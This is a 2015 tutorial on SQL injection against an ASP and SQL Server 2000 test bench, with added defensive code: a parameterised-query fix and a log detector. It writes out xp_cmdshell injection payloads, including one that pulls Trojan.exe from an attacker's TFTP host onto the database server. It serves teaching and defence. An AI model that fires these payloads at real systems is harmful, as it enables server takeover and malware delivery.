Posted: 06-Jul-2015
Advanced Exploitation using SQL Injection
By Varun Duggal
Works in the Application Security Domain
SQL Injection
The ability to inject SQL commands into the database engine through an existing application.
SQL injection occurs when user-supplied data is sent to an interpreter as part of a command or query.
Attackers trick the interpreter into executing unintended commands by supplying specially crafted data.
Injection flaws allow attackers to create, read, update, or delete any data available to the application, with whatever privileges the application's database login holds.
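The mechanism described above, as an added example that is not part of the original slides: the request parameter is pasted into the SQL text (the flaw), beside the same lookup done with a bound parameter (the fix). sqlite3 stands in for the slides' MSSQL 2000 so the block runs offline, the `products` table is constructed, and the tautology probe goes one step beyond the slides' lone single quote to show a full read of the table.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the application's data (not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("1", "widget"), ("2", "gadget"), ("3", "secret-sku")],
    )
    conn.commit()
    return conn


def vulnerable_query(conn, user_id):
    """The flawed pattern the slides exploit: the request parameter is pasted
    straight into the SQL text, so quote characters reach the parser.
    Returns (sql_text, rows, error); exactly one of rows/error is None."""
    sql = "SELECT id, name FROM products WHERE id = '" + user_id + "'"
    try:
        return sql, conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return sql, None, str(exc)


def safe_query(conn, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, name FROM products WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # "'" is the slides' vulnerability check: the interpreter sees an unterminated
    # string and returns an error, which is the signal that the parameter is injectable.
    for probe in ("1", "'", "1' OR '1'='1"):
        sql, rows, err = vulnerable_query(db, probe)
        print("vulnerable:   ", sql, "->", rows if err is None else "ERROR: " + err)
        print("parameterised:", safe_query(db, probe))
```

The lone quote raises a parse error only on the concatenated path; the tautology returns every row there, while the parameterised query treats both inputs as an id value that matches nothing.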
Vulnerable Applications
Almost all SQL databases and programming languages are potentially vulnerable:
MS SQL Server, Oracle, MySQL, PostgreSQL, DB2, MS Access, Sybase, Informix, etc.
Accessed through applications developed using:
Perl and CGI scripts that access databases
ASP, JSP, PHP
XML, XSL and XSQL
JavaScript
VB, MFC, and other ODBC-based tools and APIs
DB-specific web-based applications and APIs
Reports and DB applications
3GL- and 4GL-based languages (C, OCI, Pro*C, and COBOL)
and many more
Stored procedure
A stored procedure is a subroutine available to applications accessing a relational database system.
Stored procedures (sometimes called sprocs or SPs) are stored in the database's data dictionary. The xp_-prefixed procedures used below are extended stored procedures in the master database: DLL-backed routines that run inside the SQL Server process and can therefore reach the operating system.
Exploiting the Vulnerability
xp_cmdshell is an extended stored procedure shipped with MS SQL Server; on SQL Server 2000 it is enabled by default (from SQL Server 2005 onward it is disabled until an administrator turns it on).
It allows users to execute operating system commands under the account the SQL Server service runs as. In a default configuration only logins in the sysadmin role may call it, so the demo below presupposes an over-privileged application login.
Tasks:
Executing arbitrary OS commands
Ping server
Directory listing
Create file
Defacing website
Execute applications
Upload and download files
Extended stored procedures of interest:
xp_cmdshell (run an OS command)
xp_regread (read a registry value)
xp_servicecontrol (start/stop Windows services)
xp_availablemedia (list drives)
xp_enumdsn (list ODBC data sources)
xp_loginconfig (show login security configuration)
xp_makecab (create a cabinet archive)
xp_ntsec_enumdomains (enumerate Windows domains)
xp_terminate_process (kill a process)
Demo
Test Bench
OS: Windows XP Professional
Frontend: ASP
Backend: MSSQL 2000
Web Server: IIS 5.0
Checking whether it is vulnerable
Enter a single quote in the id parameter. If the application returns a database error (with ASP in front of SQL Server, typically an ODBC "Unclosed quotation mark" syntax error), the quote reached the SQL parser unescaped and the parameter is injectable.
Now open the URL and run the command:
';exec master..xp_cmdshell "ipconfig > c:\inetpub\wwwroot\test.txt"--
The leading quote closes the page's string literal, the semicolon starts a second (stacked) statement, and the trailing -- comments out whatever the page appends. xp_cmdshell takes a string argument; double quotes are string delimiters only when QUOTED_IDENTIFIER is OFF, so single quotes around the OS command are the portable choice.
The command's output is redirected into the IIS web root, so the file is created on the web server and can be fetched over HTTP as /test.txt (as the slide's screenshot showed).
Upload a file on the server
Start a TFTP server on the attacker's machine (192.168.1.5 in the command below) serving the file to be transferred. The database server acts as the TFTP client and pulls the file, so no listener is needed on the target; note that tftp.exe is present by default on Windows XP/2003 but is an optional feature on later Windows versions.
Now open the URL and run the command:
';exec master..xp_cmdshell "tftp -i 192.168.1.5 GET Trojan.exe C:\Trojan.exe"--
(-i selects binary transfer mode, which an executable requires.)
The TFTP server's log shows the transfer completing; the file now sits at C:\Trojan.exe on the database server and can be launched with a further xp_cmdshell call.
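The demo procedure above (probe, xp_cmdshell file write, TFTP pull) seen from both ends, as an added example that is not part of the original slides: what the two payloads look like once the browser encodes them and once the ASP page wraps them into a batch for SQL Server, and a detection pass over web-server logs that would have caught each step. The page name `/item.asp`, the query shape `SELECT * FROM items WHERE id = '...'`, the log field order and the log lines themselves are constructed assumptions, not taken from the slides; the payloads are written with single quotes around the OS command, which works regardless of the QUOTED_IDENTIFIER setting.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# The two commands the slides type into the id parameter.
PAYLOAD_WRITE_FILE = (
    "';exec master..xp_cmdshell 'ipconfig > c:\\inetpub\\wwwroot\\test.txt'--"
)
PAYLOAD_TFTP = (
    "';exec master..xp_cmdshell 'tftp -i 192.168.1.5 GET Trojan.exe C:\\Trojan.exe'--"
)


def encode_for_url(payload):
    """What the browser actually sends: quotes, spaces, ';' and '>' are percent-encoded."""
    return quote_plus(payload)


def server_side_sql(param_value):
    """Reconstructs the batch the ASP page hands to SQL Server.  The query shape is
    an assumption (the slides do not show the ASP source).  The leading quote closes
    the page's literal, ';' starts a second statement, and the trailing '--'
    comments out the closing quote the page appends."""
    return "SELECT * FROM items WHERE id = '" + param_value + "'"


# Extended stored procedures named on the slides, plus the stacked-query shape.
XP_PATTERN = re.compile(
    r"\bxp_(cmdshell|regread|servicecontrol|availablemedia|enumdsn|loginconfig"
    r"|makecab|ntsec_enumdomains|terminate_process)\b",
    re.I,
)
STACKED_EXEC = re.compile(r"'\s*;\s*exec(ute)?\b", re.I)


def suspicious_requests(log_lines):
    """Scans IIS W3C-style lines with the constructed field order
    'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status'.
    The query string is URL-decoded first, because the attack is only visible
    once %27 becomes a quote.  Returns (client_ip, decoded_query, reason) tuples."""
    hits = []
    for line in log_lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, query, status = fields[2], fields[5], fields[6]
        decoded = unquote_plus(query)
        reasons = []
        if XP_PATTERN.search(decoded):
            reasons.append("extended stored procedure")
        if STACKED_EXEC.search(decoded):
            reasons.append("stacked query")
        # The slides' first step: a lone quote that makes the page error out.
        if "'" in decoded and status.startswith("5"):
            reasons.append("quote probe with server error")
        if reasons:
            hits.append((client_ip, decoded, ", ".join(reasons)))
    return hits


# Constructed log excerpt (not from the slides) replaying the demo: the
# single-quote probe, the ipconfig write, the fetch of test.txt, the TFTP pull.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2015-07-06 10:01:12 192.168.1.5 GET /item.asp id=1 200",
    "2015-07-06 10:01:40 192.168.1.5 GET /item.asp id=%27 500",
    "2015-07-06 10:02:05 192.168.1.5 GET /item.asp id=" + encode_for_url(PAYLOAD_WRITE_FILE) + " 200",
    "2015-07-06 10:02:09 192.168.1.5 GET /test.txt - 200",
    "2015-07-06 10:03:30 192.168.1.5 GET /item.asp id=" + encode_for_url(PAYLOAD_TFTP) + " 200",
]

if __name__ == "__main__":
    print(server_side_sql(PAYLOAD_WRITE_FILE))
    for ip, query, why in suspicious_requests(SAMPLE_LOG):
        print(ip, why, "::", query)
```

Decoding before matching is the point of the detector: in the raw log the payload is one opaque token with no quote, space or semicolon in it, and a rule keyed on the literal string `xp_cmdshell` would still fire, but the stacked-query and quote-probe rules only work on the decoded form.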